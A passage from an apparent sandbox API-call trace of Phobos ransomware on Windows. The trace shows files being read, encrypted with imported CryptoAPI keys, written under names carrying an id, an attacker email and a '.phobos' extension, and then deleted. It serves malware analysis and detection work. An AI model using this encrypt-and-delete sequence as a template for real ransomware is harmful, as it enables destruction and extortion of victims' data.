"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.173] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.173] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.174] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.174] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1d7, lpOverlapped=0x0) returned 1 [0196.175] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0) returned 1 [0196.175] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1e0, lpOverlapped=0x0) returned 1 [0196.176] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.176] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.176] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.176] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.176] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.176] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.176] CloseHandle (hObject=0x154) returned 1 [0196.176] CloseHandle (hObject=0x14c) returned 1 [0196.176] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4")) returned 1 [0196.177] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.177] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=554) returned 1 [0196.177] CloseHandle (hObject=0x14c) returned 1 [0196.177] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21")) returned 0x2024 [0196.177] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.178] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.178] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.179] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.179] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.179] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x22a, lpOverlapped=0x0) returned 1 [0196.180] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x230, dwBufLen=0x230 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x230) returned 1 [0196.180] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x230, lpOverlapped=0x0) returned 1 [0196.181] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.181] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.181] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0196.181] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.181] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0196.181] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.181] CloseHandle (hObject=0x14c) returned 1 [0196.181] CloseHandle (hObject=0x154) returned 1 [0196.181] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21")) returned 1 [0196.182] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.183] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=471) returned 1 [0196.183] CloseHandle (hObject=0x154) returned 1 [0196.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6")) returned 0x2024 [0196.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.184] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.184] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.185] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.185] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.185] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1d7, lpOverlapped=0x0) returned 1 [0196.185] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0) returned 1 [0196.185] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1e0, lpOverlapped=0x0) returned 1 [0196.186] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.186] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.186] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.186] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.186] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.187] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.187] CloseHandle (hObject=0x154) returned 1 [0196.187] CloseHandle (hObject=0x14c) returned 1 [0196.187] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6")) returned 1 [0196.187] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.189] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=506) returned 1 [0196.189] CloseHandle (hObject=0x14c) returned 1 [0196.189] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 0x2024 [0196.189] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.189] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.189] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.190] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.190] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.190] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1fa, lpOverlapped=0x0) returned 1 [0196.191] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x200, dwBufLen=0x200 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x200) returned 1 [0196.191] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x200, lpOverlapped=0x0) returned 1 [0196.192] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.192] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.192] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0196.192] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.192] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0196.192] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.192] CloseHandle (hObject=0x14c) returned 1 [0196.192] CloseHandle (hObject=0x154) returned 1 [0196.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 1 [0196.193] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.193] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1660) returned 1 [0196.194] CloseHandle (hObject=0x154) returned 1 [0196.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d")) returned 0x2024 [0196.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.194] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.194] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.195] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.195] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x67c, lpOverlapped=0x0) returned 1 [0196.196] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x680, dwBufLen=0x680 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x680) returned 1 [0196.196] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x680, lpOverlapped=0x0) returned 1 [0196.197] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.197] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, 